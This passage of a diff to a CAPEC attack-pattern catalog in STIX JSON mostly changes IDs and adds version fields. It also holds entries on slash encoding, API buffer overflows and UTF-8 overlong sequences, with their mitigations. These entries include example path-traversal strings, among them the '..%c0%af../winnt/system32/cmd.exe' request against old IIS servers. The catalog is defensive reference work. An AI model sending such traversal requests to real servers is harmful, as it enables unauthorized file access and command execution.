..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--dc0c25f4-7fd4-4197-af0b-591659ea3b7c" + "id": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-78-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Verify that the user-supplied data does not use backslash character to escape malicious characters.", "type": "course-of-action", - "id": "course-of-action--d4ccc669-b6cc-428d-9744-7541476245ec" + "id": "course-of-action--f8390fd2-04de-4837-bb2c-f9e8bcf81c13" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--540b0c57-6ea7-45b0-8f80-c9fb954a3dbc", - "source_ref": "course-of-action--d4ccc669-b6cc-428d-9744-7541476245ec", + "id": "relationship--dbdf4dc2-e842-48b0-9d02-06a0117f2b15", + "source_ref": "course-of-action--f8390fd2-04de-4837-bb2c-f9e8bcf81c13", "relationship_type": "mitigates", - "target_ref": "attack-pattern--dc0c25f4-7fd4-4197-af0b-591659ea3b7c" + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--695fbe5f-4fed-40d8-99b9-45850875ecbf", - "source_ref": "course-of-action--7d4c1c31-423f-4ba2-a07a-9bbd8dd662dd", + "id": "relationship--e4059f56-d33f-4125-a86c-21511b62d57a", + "source_ref": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43", "relationship_type": "mitigates", - "target_ref": "attack-pattern--dc0c25f4-7fd4-4197-af0b-591659ea3b7c" + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-78-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Be aware of the threat of alternative method of data encoding.", "type": "course-of-action", - "id": "course-of-action--bca154b4-fe8a-4bd1-97da-beb88f9097bd" + "id": "course-of-action--59125c5d-d363-4939-9367-09200b835952" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f59c4c9d-b8cf-4aad-bb2d-f1ac81454ac6", - "source_ref": "course-of-action--bca154b4-fe8a-4bd1-97da-beb88f9097bd", + "id": "relationship--d7270969-0769-46e7-8213-d5b854f35036", + "source_ref": "course-of-action--59125c5d-d363-4939-9367-09200b835952", "relationship_type": "mitigates", - "target_ref": "attack-pattern--dc0c25f4-7fd4-4197-af0b-591659ea3b7c" + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-78-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Regular expressions can be used to filter out backslash. Make sure you decode before filtering and validating the untrusted input data.", "type": "course-of-action", - "id": "course-of-action--0eded47f-6db3-47b2-904e-eaa8d0c082e9" + "id": "course-of-action--d04f33ca-24be-46f0-a6a6-06fc33de4b74" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dc8f600f-71ce-471e-9e15-d94df727c635", - "source_ref": "course-of-action--0eded47f-6db3-47b2-904e-eaa8d0c082e9", + "id": "relationship--dd1d2c3e-fd13-49f7-b0a1-0883915a3c74", + "source_ref": "course-of-action--d04f33ca-24be-46f0-a6a6-06fc33de4b74", "relationship_type": "mitigates", - "target_ref": "attack-pattern--dc0c25f4-7fd4-4197-af0b-591659ea3b7c" + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-78-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.", "type": "course-of-action", - "id": "course-of-action--87533df3-5534-49a3-9f2a-592ced7248b7" + "id": "course-of-action--95f18f82-c186-43df-937f-09ecf87853d6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--212a9540-ac31-4ac0-902f-6f37bee47b64", - "source_ref": "course-of-action--87533df3-5534-49a3-9f2a-592ced7248b7", + "id": "relationship--fed76d01-7c49-48d9-8fa0-6fbdcd09ac9b", + "source_ref": "course-of-action--95f18f82-c186-43df-937f-09ecf87853d6", "relationship_type": "mitigates", - "target_ref": "attack-pattern--dc0c25f4-7fd4-4197-af0b-591659ea3b7c" + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--45a3e709-2310-49ff-8648-a009dba2abce", - "source_ref": "course-of-action--7ca1b98c-a3d7-4859-a784-75ff258765c8", + "id": "relationship--def22fd5-a3d1-4331-ab3c-a8637e40edff", + "source_ref": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca", "relationship_type": "mitigates", - "target_ref": "attack-pattern--dc0c25f4-7fd4-4197-af0b-591659ea3b7c" + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-78-6", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names.", "type": "course-of-action", - "id": "course-of-action--ff6f2062-bff2-487b-9b42-bca2e2380e3c" + "id": "course-of-action--b59904ff-7f32-486a-bd46-227d69e072fa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f1a57dbb-b110-4136-9f76-f648f5afbb89", - "source_ref": "course-of-action--ff6f2062-bff2-487b-9b42-bca2e2380e3c", + "id": "relationship--eae7fdc2-a9a8-4d5e-9a24-769a58a5cdc0", + "source_ref": "course-of-action--b59904ff-7f32-486a-bd46-227d69e072fa", "relationship_type": "mitigates", - "target_ref": "attack-pattern--dc0c25f4-7fd4-4197-af0b-591659ea3b7c" + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a" }, { "name": "Using Slashes in Alternate Encoding", "description": "This attack targets the encoding of the Slash characters. An attacker would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the attacker many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", @@ -43128,154 +43840,155 @@ "\n Attack Example: Slashes in Alternate Encodings\n The two following requests are equivalent on most Web servers:\n http://target server/some_directory\\..\\..\\..\\winnt\n is equivalent to\n http://target server/some_directory/../../../winnt\n Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or Unicode. Consider the strings\n http://target server/some_directory\\..%5C..%5C..\\winnt\n where %5C is equivalent to the \\ character.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e61376fd-46a0-41ba-9dfa-db531eba6e92" + "id": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-79-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Refer to the RFCs to safely decode URL.", "type": "course-of-action", - "id": "course-of-action--dace89ce-9a2e-4dff-86a7-4173fc271c1e" + "id": "course-of-action--c56b417e-08dd-48c9-8d7a-4a2a252008ad" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--18656e1e-bb81-4485-a17e-79f8a839fe57", - "source_ref": "course-of-action--dace89ce-9a2e-4dff-86a7-4173fc271c1e", + "id": "relationship--1b7338cd-e195-45fa-9a3d-0179a64934f3", + "source_ref": "course-of-action--c56b417e-08dd-48c9-8d7a-4a2a252008ad", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e61376fd-46a0-41ba-9dfa-db531eba6e92" + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--018da0d4-276c-4224-9888-50a8eb39e802", - "source_ref": "course-of-action--137932dd-0498-4500-9a8b-ff29e913a1f3", + "id": "relationship--7084bd3f-c383-48d5-b0da-6f1fc8d8c3a0", + "source_ref": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e61376fd-46a0-41ba-9dfa-db531eba6e92" + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-79-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)", "type": "course-of-action", - "id": "course-of-action--c85ae3b8-0911-4f8f-9409-37d7330e8bb2" + "id": "course-of-action--9c36c07f-9f02-497b-a549-8418278d8cfc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ed33f956-76a1-4404-804c-7e8b1bf175ef", - "source_ref": "course-of-action--c85ae3b8-0911-4f8f-9409-37d7330e8bb2", + "id": "relationship--57c1bcea-ed91-4771-83ef-cdbde39d99ec", + "source_ref": "course-of-action--9c36c07f-9f02-497b-a549-8418278d8cfc", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e61376fd-46a0-41ba-9dfa-db531eba6e92" + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--fa8919a3-90d0-47cf-b976-9015cdea0efb", - "source_ref": "course-of-action--597a29ba-0e45-465e-8db7-eea95a8e8141", + "id": "relationship--54873c18-4e0e-4118-94f3-6c45ae539f12", + "source_ref": "course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e61376fd-46a0-41ba-9dfa-db531eba6e92" + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-79-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Test your path decoding process against malicious input.", "type": "course-of-action", - "id": "course-of-action--5bb57b42-ec09-4ae2-9e9a-a4f696d1b080" + "id": "course-of-action--640b34ce-eb05-40c3-854b-abdea45ad098" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3793438d-1264-437a-a42a-3292523c9976", - "source_ref": "course-of-action--5bb57b42-ec09-4ae2-9e9a-a4f696d1b080", + "id": "relationship--3d69e68b-f84b-4163-be92-216e1b4112d2", + "source_ref": "course-of-action--640b34ce-eb05-40c3-854b-abdea45ad098", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e61376fd-46a0-41ba-9dfa-db531eba6e92" + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8a97fab3-1d83-4d2f-9b1b-fa2b06d57aea", - "source_ref": "course-of-action--87533df3-5534-49a3-9f2a-592ced7248b7", + "id": "relationship--6617c9a5-b97d-4c1b-ad91-add566fd06f3", + "source_ref": "course-of-action--95f18f82-c186-43df-937f-09ecf87853d6", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e61376fd-46a0-41ba-9dfa-db531eba6e92" + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-79-6", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Assume all input is malicious. Create a white list that defines all valid input to the application based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.", "type": "course-of-action", - "id": "course-of-action--dc50a164-b028-4db7-ae22-26fe4a11f313" + "id": "course-of-action--a8241643-15fc-4047-84fd-1d443f80b4a9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--22000566-8199-4639-9f96-56c6f7ec70b1", - "source_ref": "course-of-action--dc50a164-b028-4db7-ae22-26fe4a11f313", + "id": "relationship--f28ab700-0168-496d-9772-5d1cad1532b7", + "source_ref": "course-of-action--a8241643-15fc-4047-84fd-1d443f80b4a9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e61376fd-46a0-41ba-9dfa-db531eba6e92" + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0" }, { "name": "Buffer Overflow in an API Call", "description": "This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An attacker who has access to an API may try to embed malicious code in the API function call and exploit a buffer overflow vulnerability in the function's implementation. All clients that make use of the code library thus become vulnerable by association. This has a very broad effect on security across a system, usually affecting more than one software process.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -43361,80 +44074,81 @@ "\n Xtlib\n A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--0263b96a-6078-4b70-95b9-c6642130e6e7" + "id": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--35de9103-2200-4878-a5c4-4d983e6bc149", - "source_ref": "course-of-action--f80bedd2-ad06-4cf0-a5e5-f4fb70c030dd", + "id": "relationship--783278fb-0cbe-446a-a559-7d114e06706a", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0263b96a-6078-4b70-95b9-c6642130e6e7" + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d5768c9b-8630-4969-813d-cff64976035b", - "source_ref": "course-of-action--93cd07dc-a347-46fa-bb8c-11c020c5e047", + "id": "relationship--98e0dbe6-a94a-4303-9459-def28183f15b", + "source_ref": "course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0263b96a-6078-4b70-95b9-c6642130e6e7" + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3c7100fe-c503-46f3-baa4-f150f7b6d15c", - "source_ref": "course-of-action--649c3e97-9cc3-4a65-bf60-c929e42cf694", + "id": "relationship--4df2531e-b3be-4f20-9ea3-404a1bf7e404", + "source_ref": "course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0263b96a-6078-4b70-95b9-c6642130e6e7" + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--05692ce8-a071-4b8a-878d-4b0a245eb8c8", - "source_ref": "course-of-action--7dee5d10-4d7e-4583-873d-8ec182af868a", + "id": "relationship--eaca4f22-bac1-4cc3-8e40-2ee1dd484078", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0263b96a-6078-4b70-95b9-c6642130e6e7" + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--29b84435-637d-4108-ae2f-c6fa9a43105b", - "source_ref": "course-of-action--d90f904e-47fc-4260-974a-5c0fa7a418c1", + "id": "relationship--7da0fb75-3a9c-41b8-9e21-5ab6f33f492b", + "source_ref": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0263b96a-6078-4b70-95b9-c6642130e6e7" + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724" }, { "name": "Using UTF-8 Encoding to Bypass Validation Logic", "description": "This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \"shortest possible\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -43593,128 +44307,129 @@ "\n Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this\n http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe\n the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.\n So when the attacker requested the tainted URL, he accessed\n http://servername/scripts/../../winnt/system32/cmd.exe\n In other words, he walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where he could pass commands to the command shell, Cmd.exe.See also: CVE-2000-0884" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--5bc3ffec-6c84-4573-8f60-3e19e0b0eb80" + "id": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-80-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. Pay extra attention to the filtering of illegal characters.", "type": "course-of-action", - "id": 